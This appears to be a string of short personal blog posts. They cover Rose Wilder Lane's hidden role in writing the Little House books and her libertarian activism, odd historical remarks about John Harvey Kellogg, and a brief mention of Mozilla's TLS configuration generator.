When Lane’s mother approached her with a rough autobiographical manuscript of her own childhood, Lane sensed that an American public fatigued by the Great Depression would take to the story of the loving, persistent, and independent Ingalls family. Lane encouraged and helped her mother rewrite and sell the story as a children’s novel. The book became a big success, and an entire series replete with T.V. shows, merchandise, and museums followed. Their family was raking in the dough.
I read the entire series as a kid and stil wax nostalgic for it. I thought Lane’s mother, who’s the titled author, wrote every book on her own and only received encouragement from her Lane. It turns out, however, that the truth is more interesting.
…an ongoing mutual collaboration that involved Lane more extensively in the earlier books, and to a much lesser extent by the time the series ended, as Wilder’s confidence in her own writing ability increased. Lane insisted to the end that her role was little more than that of her mother’s adviser, despite documentation to the contrary…Literary historians believe that Lane’s editing skills brought the dramatic pacing, literary structure, and characterization critically needed to make the stories publishable in book form.
Even more fascinating is Lane’s societal and political views. She was a libertarian, economically laissez faire, anti-racist, and anti-communist. She protested paying income taxes, opposed the New Deal, and thought Social Security was a Ponzi scheme that would destroy the United States.
Lane played a hands-on role during the 1940s and 1950s in launching the “libertarian movement” and began an extensive correspondence with figures such as DuPont executive Jasper Crane and writer Frank Meyer, as well as her friend and colleague, Ayn Rand. She wrote book reviews for the National Economic Council and later for the Volker Fund, out of which grew the Institute for Humane Studies. Later, she lectured at, and gave generous financial support to, the Freedom School headed by libertarian Robert LeFevre.
I want to reread the Little House books now knowing she was a die-hard libertarian who along with her mother purposefully wove themes of individualism into the series.
Rose Wilder Lane died in her sleep at age 81, on October 30, 1968, just as she was about to depart on a three-year world tour. She was buried next to her parents at Mansfield Cemetery in Mansfield, Missouri.
I haven’t read the entire Wikipedia entry on John Harvey Kellogg yet since a colleague only recently drew my attention to this smart, prolific, and bizarre man. These parts stood out to me at first glance though.
He also recommended, to prevent children from this “solitary vice”, bandaging or tying their hands, covering their genitals with patented cages and electrical shock.
Mozilla’s TLS configuration generator is useful for providing secure defaults.
I’m proud to say this site has an A.
]]>